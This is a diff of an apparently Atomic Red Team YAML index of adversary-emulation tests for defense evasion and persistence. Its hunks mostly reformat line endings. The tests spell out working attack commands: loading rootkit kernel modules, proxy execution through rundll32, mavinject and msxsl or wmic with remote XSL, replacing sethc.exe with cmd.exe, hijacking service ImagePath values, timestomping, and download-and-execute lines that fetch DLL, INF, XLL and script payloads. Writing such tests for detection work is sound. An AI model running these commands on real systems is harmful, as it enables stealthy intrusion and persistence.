@@ -33155,10 +33155,10 @@ defense-evasion: dependencies: - description: 'The kernel module must exist on disk at specified location (#{rootkit_path}) -' + ' prereq_command: 'if [ -f #{rootkit_path} ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: | if [ ! -d #{temp_folder} ]; then mkdir #{temp_folder}; touch #{temp_folder}/safe_to_delete; fi; cp #{rootkit_source_path}/* #{temp_folder}/ @@ -33168,17 +33168,17 @@ defense-evasion: executor: command: 'sudo insmod #{rootkit_path} -' + ' cleanup_command: 'sudo rmmod #{rootkit_name} -' + ' name: sh elevation_required: true - name: Loadable Kernel Module based Rootkit auto_generated_guid: 75483ef8-f10f-444a-bf02-62eb0e48db6f description: 'Loadable Kernel Module based Rootkit -' + ' supported_platforms: - linux input_arguments: @@ -33203,11 +33203,11 @@ defense-evasion: dependencies: - description: 'The kernel module must exist on disk at specified location (#{rootkit_path}) -' + ' prereq_command: 'if [ -f /lib/modules/$(uname -r)/#{rootkit_name}.ko ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: "if [ ! -d #{temp_folder} ]; then mkdir #{temp_folder}; touch #{temp_folder}/safe_to_delete; fi;\ncp #{rootkit_source_path}/* #{temp_folder}/\ncd #{temp_folder}; make \nsudo cp #{temp_folder}/#{rootkit_name}.ko @@ -33216,7 +33216,7 @@ defense-evasion: executor: command: 'sudo modprobe #{rootkit_name} -' + ' cleanup_command: | sudo modprobe -r #{rootkit_name} sudo rm /lib/modules/$(uname -r)/#{rootkit_name}.ko @@ -33247,15 +33247,15 @@ defense-evasion: dependencies: - description: 'puppetstrings.exe must exist on disk at specified location (#{puppetstrings_path}) -' + ' prereq_command: 'if (Test-Path #{puppetstrings_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1014/bin/puppetstrings.exe" -OutFile "#{puppetstrings_path}" -' + ' executor: name: command_prompt command: "#{puppetstrings_path} #{driver_path}\n" 
@@ -33383,7 +33383,7 @@ defense-evasion: description: 'Test execution of a remote script using rundll32.exe. Upon execution notepad.exe will be opened. -' + ' supported_platforms: - windows input_arguments: @@ -33394,7 +33394,7 @@ defense-evasion: executor: command: 'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec(); -' + ' name: command_prompt - name: Rundll32 execute VBscript command auto_generated_guid: 638730e7-7aed-43dc-bf8c-8117f805f5bb @@ -33412,7 +33412,7 @@ defense-evasion: executor: command: 'rundll32 vbscript:"\..\mshtml,RunHTMLApplication "+String(CreateObject("WScript.Shell").Run("#{command_to_execute}"),0) -' + ' name: command_prompt - name: Rundll32 advpack.dll Execution auto_generated_guid: d91cae26-7fc1-457b-a854-34c8aad48c89 @@ -33431,17 +33431,17 @@ defense-evasion: dependencies: - description: 'Inf file must exist on disk at specified location (#{inf_to_execute}) -' + ' prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011.inf" -OutFile "#{inf_to_execute}" executor: command: 'rundll32.exe advpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_SingleUser,1, -' + ' name: command_prompt - name: Rundll32 ieadvpack.dll Execution auto_generated_guid: 5e46a58e-cbf6-45ef-a289-ed7754603df9 
@@ -33461,17 +33461,17 @@ defense-evasion: dependencies: - description: 'Inf file must exist on disk at specified location (#{inf_to_execute}) -' + ' prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011.inf" -OutFile "#{inf_to_execute}" executor: command: 'rundll32.exe ieadvpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_SingleUser,1, -' + ' name: command_prompt - name: Rundll32 syssetup.dll Execution auto_generated_guid: 41fa324a-3946-401e-bbdd-d7991c628125 @@ -33490,10 +33490,10 @@ defense-evasion: dependencies: - description: 'Inf file must exist on disk at specified location (#{inf_to_execute}) -' + ' prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011_DefaultInstall.inf" -OutFile "#{inf_to_execute}" @@ -33501,7 +33501,7 @@ defense-evasion: command: 'rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 .\#{inf_to_execute} -' + ' name: command_prompt - name: Rundll32 setupapi.dll Execution auto_generated_guid: 71d771cd-d6b3-4f34-bc76-a63d47a10b19 @@ -33520,10 +33520,10 @@ defense-evasion: dependencies: - description: 'Inf file must exist on disk at specified location (#{inf_to_execute}) -' + ' prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011_DefaultInstall.inf" -OutFile "#{inf_to_execute}" 
@@ -33531,7 +33531,7 @@ defense-evasion: command: 'rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 .\#{inf_to_execute} -' + ' name: command_prompt - name: Execution of HTA and VBS Files using Rundll32 and URL.dll auto_generated_guid: 22cfde89-befe-4e15-9753-47306b37a6e3 @@ -33554,7 +33554,7 @@ defense-evasion: description: 'Executes the LaunchApplication function in pcwutl.dll to proxy execution of an executable. -' + ' supported_platforms: - windows input_arguments: @@ -33565,7 +33565,7 @@ defense-evasion: executor: command: 'rundll32.exe pcwutl.dll,LaunchApplication #{exe_to_launch} -' + ' name: command_prompt T1134.005: technique: @@ -33964,7 +33964,7 @@ defense-evasion: description: 'Change Service registry ImagePath of a bengin service to a malicious file -' + ' supported_platforms: - windows input_arguments: @@ -33984,22 +33984,22 @@ defense-evasion: dependencies: - description: 'The service must exist (#{weak_service_name}) -' + ' prereq_command: 'if (Get-Service #{weak_service_name}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'sc.exe create #{weak_service_name} binpath= "#{weak_service_path}" -' + ' executor: command: 'reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /f /v ImagePath /d "#{malicious_service_path}" -' + ' cleanup_command: 'sc.exe delete #{weak_service_name} -' + ' name: command_prompt T1548.001: technique: @@ -34055,7 +34055,7 @@ defense-evasion: description: 'Make, change owner, and change file attributes on a C source code file -' + ' supported_platforms: - macos - linux @@ -34081,7 +34081,7 @@ defense-evasion: auto_generated_guid: 759055b3-3885-4582-a8ec-c00c9d64dd79 description: 'This test sets the SetUID flag on a file in Linux and macOS. -' + ' supported_platforms: - macos - linux 
@@ -34097,14 +34097,14 @@ defense-evasion: sudo chmod u+s #{file_to_setuid} cleanup_command: 'sudo rm #{file_to_setuid} -' + ' name: sh elevation_required: true - name: Set a SetGID flag on file auto_generated_guid: db55f666-7cba-46c6-9fe6-205a05c3242c description: 'This test sets the SetGID flag on a file in Linux and macOS. -' + ' supported_platforms: - macos - linux @@ -34120,7 +34120,7 @@ defense-evasion: sudo chmod g+s #{file_to_setuid} cleanup_command: 'sudo rm #{file_to_setuid} -' + ' name: sh elevation_required: true T1218: @@ -34179,7 +34179,7 @@ defense-evasion: description: 'Injects arbitrary DLL into running process specified by process ID. Requires Windows 10. -' + ' supported_platforms: - windows input_arguments: @@ -34195,17 +34195,17 @@ defense-evasion: dependencies: - description: 'T1218.dll must exist on disk at specified location (#{dll_payload}) -' + ' prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/x64/T1218.dll" -OutFile "#{dll_payload}" executor: command: 'mavinject.exe #{process_id} /INJECTRUNNING #{dll_payload} -' + ' name: command_prompt elevation_required: true - name: SyncAppvPublishingServer - Execute arbitrary PowerShell code @@ -34213,7 +34213,7 @@ defense-evasion: description: 'Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe. Requires Windows 10. -' + ' supported_platforms: - windows input_arguments: 
@@ -34224,14 +34224,14 @@ defense-evasion: executor: command: 'SyncAppvPublishingServer.exe "n; #{powershell_code}" -' + ' name: command_prompt - name: Register-CimProvider - Execute evil dll auto_generated_guid: ad2c17ed-f626-4061-b21e-b9804a6f3655 description: 'Execute arbitrary dll. Requires at least Windows 8/2012. Also note this dll can be served up via SMB -' + ' supported_platforms: - windows input_arguments: @@ -34243,17 +34243,17 @@ defense-evasion: dependencies: - description: 'T1218-2.dll must exist on disk at specified location (#{dll_payload}) -' + ' prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Win32/T1218-2.dll" -OutFile "#{dll_payload}" executor: command: 'C:\Windows\SysWow64\Register-CimProvider.exe -Path #{dll_payload} -' + ' name: command_prompt - name: InfDefaultInstall.exe .inf Execution auto_generated_guid: 54ad7d5a-a1b5-472c-b6c4-f8090fb2daef @@ -34272,17 +34272,17 @@ defense-evasion: dependencies: - description: 'INF file must exist on disk at specified location (#{inf_to_execute}) -' + ' prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Infdefaultinstall.inf" -OutFile "#{inf_to_execute}" executor: command: 'InfDefaultInstall.exe #{inf_to_execute} -' + ' name: command_prompt - name: ProtocolHandler.exe Downloaded a Suspicious File auto_generated_guid: db020456-125b-4c8b-a4a7-487df8afb5a2 @@ -34290,7 +34290,7 @@ defense-evasion: Office. On successful execution you should see Microsoft Word launch a blank file. -' + ' supported_platforms: - windows input_arguments: 
@@ -34303,15 +34303,15 @@ defense-evasion: - description: 'Microsoft Word must be installed with the correct path and protocolhandler.exe must be provided -' + ' prereq_command: 'if (Test-Path "(Resolve-Path "C:\Program Files*\Microsoft Office\root\Office16")\protocolhandler.exe") {exit 0} else {exit 1} -' + ' get_prereq_command: 'write-host "Install Microsoft Word or provide correct path." -' + ' executor: name: command_prompt elevation_required: false @@ -34323,7 +34323,7 @@ defense-evasion: description: 'Emulates attack with Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe -' + ' supported_platforms: - windows input_arguments: @@ -34345,15 +34345,15 @@ defense-evasion: prereq_command: 'if (Test-Path #{mwcpath}\#{mwcname} ) {exit 0} else {exit 1} -' + ' get_prereq_command: 'write-host ".Net must be installed for this test to work correctly." -' + ' executor: command: '#{mwcpath}\#{mwcname} "#{xml_payload}" output.txt -' + ' name: powershell elevation_required: false - name: Renamed Microsoft.Workflow.Compiler.exe Payload Executions @@ -34361,7 +34361,7 @@ defense-evasion: description: 'Emulates attack with a renamed Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe -' + ' supported_platforms: - windows input_arguments: @@ -34390,7 +34390,7 @@ defense-evasion: get_prereq_command: 'write-host "you need to rename workflow complier before you run this test" -' + ' executor: command: "#{renamed_binary} #{xml_payload} output.txt\n" name: powershell @@ -34433,7 +34433,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Invoke-ATHRemoteFXvGPUDisablementCommand -ModuleName #{module_name} -ModulePath #{module_path}' 
@@ -34500,14 +34500,14 @@ defense-evasion: executor: command: 'C:\windows\system32\SyncAppvPublishingServer.vbs "\n;#{command_to_execute}" -' + ' name: command_prompt - name: manage-bde.wsf Signed Script Command Execution auto_generated_guid: 2a8f2d3c-3dec-4262-99dd-150cb2a4d63a description: 'Executes the signed manage-bde.wsf script with options to execute an arbitrary command. -' + ' supported_platforms: - windows input_arguments: @@ -34521,7 +34521,7 @@ defense-evasion: cscript %windir%\System32\manage-bde.wsf cleanup_command: 'set comspec=%windir%\System32\cmd.exe -' + ' name: command_prompt T1027.002: technique: @@ -34597,10 +34597,10 @@ defense-evasion: executor: command: 'cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin -' + ' cleanup_command: 'rm /tmp/packed_bin -' + ' name: sh - name: Binary packed by UPX, with modified headers (linux) auto_generated_guid: f06197f8-ff46-48c2-a0c6-afc1b50665e1 @@ -34619,10 +34619,10 @@ defense-evasion: executor: command: 'cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin -' + ' cleanup_command: 'rm /tmp/packed_bin -' + ' name: sh - name: Binary simply packed by UPX auto_generated_guid: b16ef901-00bb-4dda-b4fc-a04db5067e20 @@ -34639,10 +34639,10 @@ defense-evasion: executor: command: 'cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin -' + ' cleanup_command: 'rm /tmp/packed_bin -' + ' name: sh - name: Binary packed by UPX, with modified headers auto_generated_guid: 4d46e16b-5765-4046-9f25-a600d3e65e4d @@ -34661,10 +34661,10 @@ defense-evasion: executor: command: 'cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin -' + ' cleanup_command: 'rm /tmp/packed_bin -' + ' name: sh T1036.006: technique: @@ -34718,7 +34718,7 @@ defense-evasion: auto_generated_guid: 89a7dd26-e510-4c9f-9b15-f3bae333360f description: 'Space After Filename -' + ' supported_platforms: - macos executor: 
@@ -34934,7 +34934,7 @@ defense-evasion: auto_generated_guid: 150c3a08-ee6e-48a6-aeaf-3659d24ceb4e description: 'Common Sudo enumeration methods. -' + ' supported_platforms: - macos - linux @@ -34948,7 +34948,7 @@ defense-evasion: This is dangerous to modify without using ''visudo'', do not do this on a production system. -' + ' supported_platforms: - macos - linux @@ -34963,7 +34963,7 @@ defense-evasion: description: 'Sets sudo caching tty_tickets value to disabled. This is dangerous to modify without using ''visudo'', do not do this on a production system. -' + ' supported_platforms: - macos - linux @@ -35073,7 +35073,7 @@ defense-evasion: | grep -iE ''Oracle|VirtualBox|VMWare|Parallels'') then echo "Virtualization Environment detected"; fi; -' + ' - name: Detect Virtualization Environment (Windows) auto_generated_guid: 502a7dc4-9d6f-4d28-abf2-f0e84692562d description: 'Windows Management Instrumentation(WMI) objects contains system @@ -35083,7 +35083,7 @@ defense-evasion: This is meant to find the result of Not supported, which is the result if run in a virtual machine -' + ' supported_platforms: - windows executor: @@ -35100,7 +35100,7 @@ defense-evasion: the system. If it''s a virtual machine, one of the device manufacturer will be a Virtualization Software. -' + ' supported_platforms: - macos executor: @@ -35110,7 +35110,7 @@ defense-evasion: ''Oracle|VirtualBox|VMWare|Parallels'') then echo ''Virtualization Environment detected''; fi; -' + ' T1542.001: technique: id: attack-pattern--16ab6452-c3c1-497c-a47d-206018ca1ada @@ -35350,7 +35350,7 @@ defense-evasion: executor: command: 'start #{docx_file} -' + ' name: command_prompt T1055.003: technique: @@ -35593,7 +35593,7 @@ defense-evasion: auto_generated_guid: 5f9113d5-ed75-47ed-ba23-ea3573d05810 description: 'Stomps on the access timestamp of a file -' + ' supported_platforms: - linux - macos 
@@ -35605,13 +35605,13 @@ defense-evasion: executor: command: 'touch -a -t 197001010000.00 #{target_filename} -' + ' name: sh - name: Set a file's modification timestamp auto_generated_guid: 20ef1523-8758-4898-b5a2-d026cc3d2c52 description: 'Stomps on the modification timestamp of a file -' + ' supported_platforms: - linux - macos @@ -35623,7 +35623,7 @@ defense-evasion: executor: command: 'touch -m -t 197001010000.00 #{target_filename} -' + ' name: sh - name: Set a file's creation timestamp auto_generated_guid: 8164a4a6-f99c-4661-ac4f-80f5e4e78d2b @@ -35669,7 +35669,7 @@ defense-evasion: executor: command: 'touch -acmr #{reference_file_path} #{target_file_path} -' + ' name: sh - name: Windows - Modify file creation timestamp with PowerShell auto_generated_guid: b3b2c408-2ff0-4a33-b89b-1cb46a9e6a9c @@ -35692,10 +35692,10 @@ defense-evasion: - description: 'A file must exist at the path (#{file_path}) to change the creation time on -' + ' prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Path #{file_path} -Force | Out-Null Set-Content #{file_path} -Value "T1551.006 Timestomp" -Force | Out-Null @@ -35703,10 +35703,10 @@ defense-evasion: command: 'Get-ChildItem #{file_path} | % { $_.CreationTime = "#{target_date_time}" } -' + ' cleanup_command: 'Remove-Item #{file_path} -Force -ErrorAction Ignore -' + ' name: powershell - name: Windows - Modify file last modified timestamp with PowerShell auto_generated_guid: f8f6634d-93e1-4238-8510-f8a90a20dcf2 @@ -35729,10 +35729,10 @@ defense-evasion: - description: 'A file must exist at the path (#{file_path}) to change the modified time on -' + ' prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Path #{file_path} -Force | Out-Null Set-Content #{file_path} -Value "T1551.006 Timestomp" -Force | Out-Null 
@@ -35740,10 +35740,10 @@ defense-evasion: command: 'Get-ChildItem #{file_path} | % { $_.LastWriteTime = "#{target_date_time}" } -' + ' cleanup_command: 'Remove-Item #{file_path} -Force -ErrorAction Ignore -' + ' name: powershell - name: Windows - Modify file last access timestamp with PowerShell auto_generated_guid: da627f63-b9bd-4431-b6f8-c5b44d061a62 @@ -35766,10 +35766,10 @@ defense-evasion: - description: 'A file must exist at the path (#{file_path}) to change the last access time on -' + ' prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Path #{file_path} -Force | Out-Null Set-Content #{file_path} -Value "T1551.006 Timestomp" -Force | Out-Null @@ -35777,10 +35777,10 @@ defense-evasion: command: 'Get-ChildItem #{file_path} | % { $_.LastAccessTime = "#{target_date_time}" } -' + ' cleanup_command: 'Remove-Item #{file_path} -Force -ErrorAction Ignore -' + ' name: powershell - name: Windows - Timestomp a File auto_generated_guid: d7512c33-3a75-4806-9893-69abc3ccdd43 @@ -35798,25 +35798,25 @@ defense-evasion: dependencies: - description: 'timestomp.ps1 must be present in #{file_path}. -' + ' prereq_command: 'if (Test-Path #{file_path}\timestomp.ps1) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest "https://raw.githubusercontent.com/mitre-attack/attack-arsenal/bc0ba1d88d026396939b6816de608cb279bfd489/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/timestomp.ps1" -OutFile "#{file_path}\timestomp.ps1" -' + ' - description: 'kxwn.lock must be present in #{file_path}. -' + ' prereq_command: 'if (Test-Path -path "#{file_path}\kxwn.lock") {exit 0} else {exit 1} -' + ' get_prereq_command: 'New-Item -Path #{file_path}\kxwn.lock -ItemType File -' + ' executor: command: | import-module #{file_path}\timestomp.ps1 
@@ -36790,10 +36790,10 @@ defense-evasion: - description: 'Test requrires a file to take ownership of to be located at (#{file_folder_to_own}) -' + ' prereq_command: 'IF EXIST #{file_folder_to_own} ( EXIT 0 ) ELSE ( EXIT 1 ) -' + ' get_prereq_command: | mkdir #{file_folder_to_own} echo T1222.001_takeown1 >> #{file_folder_to_own}\T1222.001_takeown1.txt @@ -36801,7 +36801,7 @@ defense-evasion: executor: command: 'takeown.exe /f #{file_folder_to_own} /r -' + ' name: command_prompt - name: cacls - Grant permission to specified user or group recursively auto_generated_guid: a8206bcc-f282-40a9-a389-05d9c0263485 @@ -36824,10 +36824,10 @@ defense-evasion: dependencies: - description: 'Test requrires a file to modify to be located at (#{file_or_folder}) -' + ' prereq_command: 'IF EXIST #{file_or_folder} ( EXIT 0 ) ELSE ( EXIT 1 ) -' + ' get_prereq_command: | mkdir #{file_or_folder} echo T1222.001_cacls1 >> #{file_or_folder}\T1222.001_cacls1.txt @@ -36835,7 +36835,7 @@ defense-evasion: executor: command: 'icacls.exe #{file_or_folder} /grant #{user_or_group}:F -' + ' name: command_prompt - name: attrib - Remove read-only attribute auto_generated_guid: bec1e95c-83aa-492e-ab77-60c71bbd21b0 @@ -36853,10 +36853,10 @@ defense-evasion: dependencies: - description: 'Test requrires a file to modify to be located at (#{file_or_folder}) -' + ' prereq_command: 'IF EXIST #{file_or_folder} ( EXIT 0 ) ELSE ( EXIT 1 ) -' + ' get_prereq_command: | mkdir #{file_or_folder} echo T1222.001_attrib1 >> #{file_or_folder}\T1222.001_attrib1.txt @@ -36866,7 +36866,7 @@ defense-evasion: executor: command: 'attrib.exe -r #{file_or_folder}\*.* /s -' + ' name: command_prompt - name: attrib - hide file auto_generated_guid: 32b979da-7b68-42c9-9a99-0e39900fc36c 
@@ -36884,10 +36884,10 @@ defense-evasion: dependencies: - description: 'Test requires a file to modify to be located at (#{file_or_folder}) -' + ' prereq_command: 'IF EXIST #{file_or_folder} ( EXIT 0 ) ELSE ( EXIT 1 ) -' + ' get_prereq_command: | mkdir #{file_or_folder} echo T1222.001_attrib1 >> #{file_or_folder}\T1222.001_attrib1.txt @@ -36925,18 +36925,18 @@ defense-evasion: - description: 'Backup of original folder permissions should exist (for use in cleanup commands) -' + ' prereq_command: 'IF EXIST #{file_path} ( EXIT 0 ) ELSE ( EXIT 1 ) -' + ' get_prereq_command: 'icacls #{path} /save #{file_path} /t /q >nul 2>&1 -' + ' executor: command: icacls "#{path}" /grant Everyone:F /T /C /Q cleanup_command: 'icacls ''#{path}'' /restore #{file_path} /q >nul 2>&1 -' + ' name: command_prompt elevation_required: true T1220: @@ -37032,7 +37032,7 @@ defense-evasion: at https://www.microsoft.com/en-us/download/details.aspx?id=21714. Open Calculator.exe when test sucessfully executed, while AV turned off. -' + ' supported_platforms: - windows input_arguments: 
@@ -37048,26 +37048,26 @@ defense-evasion: dependencies: - description: 'XML file must exist on disk at specified location (#{xmlfile}) -' + ' prereq_command: 'if (Test-Path #{xmlfile}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{xmlfile}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/msxslxmlfile.xml" -OutFile "#{xmlfile}" - description: 'XSL file must exist on disk at specified location (#{xslfile}) -' + ' prereq_command: 'if (Test-Path #{xslfile}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{xslfile}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/msxslscript.xsl" -OutFile "#{xslfile}" executor: command: 'C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile} -' + ' name: command_prompt - name: MSXSL Bypass using remote files auto_generated_guid: a7c3ab07-52fb-49c8-ab6d-e9c6d4a0a985 @@ -37076,7 +37076,7 @@ defense-evasion: at https://www.microsoft.com/en-us/download/details.aspx?id=21714. Open Calculator.exe when test sucessfully executed, while AV turned off. -' + ' supported_platforms: - windows input_arguments: @@ -37091,14 +37091,14 @@ defense-evasion: executor: command: 'C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile} -' + ' name: command_prompt - name: WMIC bypass using local XSL file auto_generated_guid: 1b237334-3e21-4a0c-8178-b8c996124988 description: 'Executes the code specified within a XSL script using a local payload. -' + ' supported_platforms: - windows input_arguments: 
@@ -37114,17 +37114,17 @@ defense-evasion: dependencies: - description: 'XSL file must exist on disk at specified location (#{local_xsl_file}) -' + ' prereq_command: 'if (Test-Path #{local_xsl_file}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{local_xsl_file}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1220/src/wmicscript.xsl" -OutFile "#{local_xsl_file}" executor: command: 'wmic #{wmic_command} /FORMAT:"#{local_xsl_file}" -' + ' name: command_prompt - name: WMIC bypass using remote XSL file auto_generated_guid: 7f5be499-33be-4129-a560-66021f379b9b @@ -37132,7 +37132,7 @@ defense-evasion: payload. Open Calculator.exe when test sucessfully executed, while AV turned off. -' + ' supported_platforms: - windows input_arguments: @@ -37147,7 +37147,7 @@ defense-evasion: executor: command: 'wmic #{wmic_command} /FORMAT:"#{remote_xsl_file}" -' + ' name: command_prompt persistence: T1546.008: @@ -37241,7 +37241,7 @@ persistence: description: 'Comma separated list of system binaries to which you want to attach each #{attached_process}. Default: "osk.exe" -' + ' type: String default: osk.exe, sethc.exe, utilman.exe, magnify.exe, narrator.exe, DisplaySwitch.exe, atbroker.exe @@ -37249,7 +37249,7 @@ persistence: description: 'Full path to process to attach to target in #{parent_list}. Default: cmd.exe -' + ' type: Path default: C:\windows\system32\cmd.exe executor: @@ -37283,7 +37283,7 @@ persistence: auto_generated_guid: 934e90cf-29ca-48b3-863c-411737ad44e3 description: 'Replace sticky keys binary (sethc.exe) with cmd.exe -' + ' supported_platforms: - windows executor: @@ -37294,7 +37294,7 @@ persistence: copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe cleanup_command: 'copy /Y C:\Windows\System32\sethc_backup.exe C:\Windows\System32\sethc.exe -' + ' name: command_prompt elevation_required: true T1098: 
@@ -37371,7 +37371,7 @@ persistence: auto_generated_guid: 5598f7cb-cf43-455e-883a-f6008c5d46af description: 'Manipulate Admin Account Name -' + ' supported_platforms: - windows executor: @@ -37437,7 +37437,7 @@ persistence: dependencies: - description: 'PS Module ActiveDirectory -' + ' prereq_command: "Try {\n Import-Module ActiveDirectory -ErrorAction Stop | Out-Null\n exit 0\n} \nCatch {\n exit 1\n}\n" get_prereq_command: | @@ -37460,14 +37460,14 @@ persistence: cleanup_command: 'Get-ADUser -LDAPFilter "(&(samaccountname=#{account_prefix}-*)(givenName=Test))" | Remove-ADUser -Confirm:$False -' + ' name: powershell - name: AWS - Create a group and add a user to that group auto_generated_guid: 8822c3b0-d9f9-4daf-a043-49f110a31122 description: 'Adversaries create AWS group, add users to specific to that group to elevate their privilieges to gain more accesss -' + ' supported_platforms: - iaas:aws input_arguments: @@ -37479,14 +37479,14 @@ persistence: - description: 'Check if the user exists, we can only add a user to a group if the user exists. -' + ' prereq_command: 'aws iam list-users | grep #{username} -' + ' get_prereq_command: 'echo Please run atomic test T1136.003, before running this atomic test -' + ' executor: command: | aws iam create-group --group-name #{username} @@ -37700,7 +37700,7 @@ persistence: command: 'powershell -c "iwr -URI ''#{xll_url}'' -o ''#{local_file}''; IEX ((new-object -ComObject excel.application).RegisterXLL(''$env:tmp\HelloWorldXll.xll''))" -' + ' T1098.001: technique: external_references: @@ -37807,13 +37807,13 @@ persistence: dependencies: - description: 'AzureAD module must be installed. -' + ' prereq_command: 'if (Get-Module AzureAD) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Install-Module -Name AzureAD -Force -' + ' executor: command: | Import-Module -Name AzureAD 
@@ -37884,13 +37884,13 @@ persistence: dependencies: - description: 'AzureAD module must be installed. -' + ' prereq_command: 'if (Get-Module AzureAD) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Install-Module -Name AzureAD -Force -' + ' executor: command: | Import-Module -Name AzureAD @@ -37932,7 +37932,7 @@ persistence: description: 'Adversaries create their own new access and secret keys to programatically interact with AWS environment, which is already compromised -' + ' supported_platforms: - iaas:aws input_arguments: @@ -37943,14 +37943,14 @@ persistence: dependencies: - description: 'Check if the user exists. -' + ' prereq_command: 'aws iam list-users | grep #{username} -' + ' get_prereq_command: 'echo Please run atomic test T1136.003, before running this atomic -' + ' executor: command: | aws iam create-access-key --user-name #{username} > $PathToAtomicsFolder/T1098.001/bin/aws_secret.creds @@ -38145,11 +38145,11 @@ persistence: - description: 'Reg files must exist on disk at specified locations (#{registry_file} and #{registry_cleanup_file}) -' + ' prereq_command: 'if ((Test-Path #{registry_file}) -and (Test-Path #{registry_cleanup_file})) {exit 0} else {exit 1} -' + ' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -Type Directory (split-path #{registry_file}) -ErrorAction ignore | Out-Null @@ -38158,11 +38158,11 @@ persistence: - description: 'DLL''s must exist in the C:\Tools directory (T1546.010.dll and T1546.010x86.dll) -' + ' prereq_command: 'if ((Test-Path c:\Tools\T1546.010.dll) -and (Test-Path c:\Tools\T1546.010x86.dll)) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory C:\Tools -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/bin/T1546.010.dll" -OutFile C:\Tools\T1546.010.dll 
